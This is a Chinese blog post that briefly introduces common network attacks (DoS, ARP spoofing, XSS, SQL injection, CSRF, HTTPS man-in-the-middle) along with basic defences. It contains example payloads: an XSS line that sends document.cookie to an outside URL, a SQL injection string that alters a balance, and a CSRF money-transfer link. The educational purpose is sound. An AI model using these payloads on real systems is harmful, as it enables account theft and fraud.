常见的网络安全攻防

最新推荐文章于 2023-04-14 14:27:32 发布
最新推荐文章于 2023-04-14 14:27:32 发布
阅读量6.8k 收藏 4
点赞数 1
文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55861837/article/details/123470500
版权

首先提一笔,在公司上班后的我们,要遵守公司的SOP,人走盖电脑,之类不让人看到你电脑信息的东西,一般公司会让你用公司电脑开发,极个别可以用自己电脑。那么我们就思维的聊一下网络安全攻击吧。

攻击手段

阻断服务攻击(DoS)

  • 阻断服务攻击(Denial-of service attack),想办法将目标网络资源用尽
  • 变种:分布式阻断服务攻击(Distributed Denial-of service)
    • 带宽消耗型(消耗目标的带宽)
    • 资源消耗型(消耗目标的计算资源)

肉机,被病毒感染的计算机,攻击者远程肉机,然后进行攻击
防御

  • 防火墙 好的防火墙可以识别异常流量
  • 交换机(路由器) 类似于防火墙
  • 流量清晰 类似防火墙,异常。

地址解析欺骗(Address Resolution Reotocol spoofing)
因为可以用做局域网调试工具,也可以被用做工具

  • 地址解析 内网里有自己的MAC 地址 每一个主机定期发一个ARP请求,其他主机收到了这个请求,就会去返回自己的IP MAC_C
  • 欺骗 就是拿着人家的IP 和自己的MAC去骗信息
  • 局域网中就是要去加入这个第三方,然后去监听封包。

跨站脚本攻击(XSS)
将跨站脚本(Cross Site Scripting) 注入到被攻击的网页上,
用户打开网页会执行跨站脚本。

document.createElement('script').src='http://.../?='+document.cookie 偷kookie

  • 输入过滤(转义)
  • 输出过滤(转义)

SQL注入

';update user set money=99999 where id = 10025;//'

跨站请求伪造(csrf)

https://a.com/transfer?money=10000&to=123456
<a href='https://a.com/transfer?money=10000&to123456'>点击下载有趣内容</a>

登录之后,就会有信息保存在网站里,然后,攻击就拿到这个,让你点击别的然后执行这个地址,从而拿到钱

请求改为post,加一个name = 'csrf' value='123asdafa12'
这个value是这个正确的网站打开才生成

HTTPS中间人攻击
正常的是,客户端给服务端发请求,服务端发证书认证,返回信息
黑客走到中间,会和服务端进行真正的通信,然后又会接收客户端请求,发伪造的证书,前提就是在客户端上安装了非法根证书。

黑客换成Fiddle,Chales,Whistle 这些合法工具,这个就是HTTPS抓包工具
如果中间换成爬虫,就是一边读客户端数据,一边返回服务器请求。

陈Joys
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络安全--安全攻防概述
weixin_43774199的博客
08-18 1万+
目录 一、安全攻防简介 1.1安全攻防介绍 1.2网络安全概述 1.3网络攻击: 1.4安全防御 二、信息安全发展历程 2.1信息安全发展简介 2.2信息安全发展历程 三、信息安全职业发展方向 3.1信息安全职业前景 3.2信息安全职业发展方向 课程目标:这节课我们来介绍安全攻防以及信息安全的职业发展历程,去了解什么是安全攻防以及安全攻防的基本概念,攻击和防御的由来。 任务目标:通过对这节课的学习,能够对安全攻防有进一步的了解和认识,掌握安全攻防基本概念,了解信息安全的发展历程和职
网络安全攻防:概述
m0_49355450的博客
01-02 2934
转自微信公众号:计算机与网络安全 01 传统网络安全攻防体系 黑客发起一次完整的网络攻击一般包含:目标锁定、信息采集、漏洞分析、攻击执行、权限提升、目标控制等步骤。 (1)目标锁定 发起攻击的第一步就是确定一个目标,要确定本次攻击的可行性,明确这次攻击的目的和意义,而不是盲目发起攻击,既要知道自己发起攻击是为了什么,又要知道自己发起攻击的后果是什么,要通过攻击得到什么效果。在锁定目标、明确目的后,进入攻击的下一步骤。 (2)信息采集 古代战争讲究兵法,要出奇制胜,现代网络攻击也是如此,长时间的攻击能让对手有
网络安全攻防
stqer的博客
04-25 5547
web攻击 常见Web漏洞原理及修复方法 XSS攻击 指的是跨脚本攻击,指的是攻击者在网页中嵌套,恶意脚本程序,当用户打开网页时,程序开始在浏览器上启动,盗取用户的cooks,从而盗取密码等信息,下载执行木马程序。 CSRF攻击 CSRF攻击的全称是跨站请求伪造(cross site request forgery), 是一种对网站的恶意利用,你可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义向第三方网站发送恶意请求。CRSF能做的事情包括利用你的身份发邮件、发短信、进行交易转账等等,甚至盗取你的
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛ctf题目
网络安全攻防战.pdf
09-20
网络安全攻防战.pdf
无线网络安全攻防实战进阶
01-28
无线网络安全攻防实战进阶,无线网络安全攻防实战进阶,有问题加q1186351245
python网络安全攻防平台项目
最新发布
04-13
Python == 2.7 Django == 1.9 xadmin 使用GitHub上源码安装 其他第三方包 使用pip安装
网络安全攻防+web常见系统收集关键字
06-23
这个资源是一份非常实用的参考资料,特别为有志于网络安全领域从事渗透测试、网络安全评估和漏洞挖掘等工作的学习者准备。该资源包含了常见Web系统,如CMS、框架和核心,在进行渗透测试时使用的常见关键词,如漏洞...
网络安全基础-网络攻防协议与安全
04-09
网络安全基础,网络攻防协议与安全 本书从网络攻防、协议与安全解决方案的角度阐述网络安全,把网络看成安全与不安全的源头。
网络安全攻防实战教程/从0基础到进阶学习渗透测试/kali
03-29
网络安全涉及面特别广,本课程主要针对有一定的网络组网技术和网络安全0基础的学生想自学网络安全攻防方面的知识,主要包括网络攻防实验环境虚拟机搭建、网络协议分析、网络信息收集(信息扫描)、网络设备加固、网络探测技术及分析防御方法、Windows攻击技术及防御方法、Linux攻击技术及防御方法、无线网络和移动终端平台安全威胁、暴力破解、SQL注入方法等实战教程。
网络安全自学篇】网络安全攻防训练营-运维基础学习
D.T.69的博客
06-25 5494
接上一篇文章([网络安全自学篇] 2020年安全学习规划)内容,2020年目标是做些简单的渗透测试,漏洞扫描等安全相关工作;与运维、网络等科室同事日常工作沟通,故此篇文章进一步介绍Windows、Linux、数据库、中间件等的基础知识。 目录 Windows基础 应急响应介绍 这次有幸参与网络安全攻防训练营6月份应急响应的培训学习,别看是CTF比赛相关的内容,但其实学习的内容也是有基础的内容,比较适合我这样的小白学习。基础内容主要涉及运维相关知识(Windows安全、Linux安全)、数据库、中间件
网络安全攻防六要素
liuruo11000的博客
10-31 320
网络信息安全面对的不一样威协下手,阐述了信息搜集、动态口令进攻、跨站脚本攻击、恶意代码、Web应用程序流程进攻、网络嗅探、谣言、拒绝服务式攻击等几种进攻技术,并做出一定的实例分析。:访问控制首先从数据库的安全性和不可否认性角度出发,根据身份验证应用访问控制技术,要求客户或程序流程针对资源与全面的浏览范畴,确保合法合规用户可合理合法地选择系统及数据信息,完成的资源可控管理方法,与此同时让用户没法实际操作自身管理权限范畴以外信息内容。比较常见网络信息安全防御方式有。
10大常见网络安全攻击手段及防御方法总结
qq_35358965的博客
04-14 2448
购买网站托管服务的时候,Web托管公司通常已经为你的网站部署了WAF,但你自己仍然可以再设一个。此类攻击可以是古怪的419骗局,或者涉及假冒电子邮件地址、貌似真实的网站和极具说服力用语的高端攻击。作为用户,只要看看网站的URL是不是以https开头就能发现这一潜在风险了,因为HTTPS中的s指的就是数据是加密的,缺了S就是未加密。相关研究表明,跨站脚本攻击大约占据了所有攻击的40%,是最为常见的一类网络攻击。此类攻击最近的案例是谷歌发现的,在Windows和chrome软件中发现了潜在的零日攻击。
网络信息安全攻防实验室
木槿华年的博客
08-05 2553
基础关 第5题 种族歧视 分值:300 小明同学今天访问了一个网站,竟然不允许中国人访问!太坑了,于是小明同学决心一定要进去一探究竟! 通关地址:http://lab1.xseclab.com/base1_0ef337f3afbe42d5619d7a36c19c20ab/index.php   使用burpsuite 发现get请求报文中有一项内容为: Cookie: saeut=1...
常见网络安全攻击及防御技术概述
2201_75362610的博客
03-22 1984
网络安全技术涉及从物理层到业务层的各个层面,贯穿产品设计到产品上线运营的全流程。现阶段网络攻击的方式和种类也随着互联网技术的发展而不断迭代,做好网络安全防护的前提是我们要对网络攻击有充分的了解。下文将抛砖引玉对常见网络安全攻击及防御技术进行简单介绍。1、防拒绝服务攻击拒绝服务攻击可以理解为攻击者以消耗被攻击者可用资源为手段,以达到网络资源和系统资源消耗殆尽为目的,从而使被攻击者无法响应正常的业务请求。拒绝服务攻击是黑客常用的攻击手段之一,一般我们把拒绝服务攻击分为网络资源类和系统资源类。
网络攻防常见网络攻防技术——黑客攻防(通俗易懂版)
热门推荐
九芒星的博客
04-16 5万+
几种常见网络攻防技术 前言 一、SQL注入 二、XSS 攻击 1.反射型 2.存储型 三、CSRF 攻击 四、DDoS 攻击 五、DNS劫持 六、JSON 劫持 七、暴力破解 文章同样适用于非专业的朋友们,全文通俗化表达,一定能找到你亲身经历过的网络攻击(建议大家认真看完,这篇文章会刷新你对网络攻防的认知)。文章暂不谈网络攻防具体操作实现过程,我们用通俗易懂的语言一块聊聊——神秘的“网络攻防
常见六大Web安全攻防解析
weixin_34352449的博客
01-31 1328
前言 在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的攻击技术层出不穷。如何才能更好地保护我们的数据?本文主要侧重于分析几种常见的攻击的类型以及防御的方法。 想阅读更多优质原创文章请猛戳GitHub博客 一、XSS XSS (Cross-Site Scripting),跨站脚本攻击,因为缩写和 CSS重叠,所以只能叫 XSS。跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏...
python网络安全攻防
03-02
Python是一种功能强大的编程语言,它在网络安全攻防领域也有广泛的应用。下面是一些关于Python网络安全攻防的介绍: 1. 网络扫描和漏洞利用:Python提供了许多库和工具,可以用于网络扫描和漏洞利用。例如,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值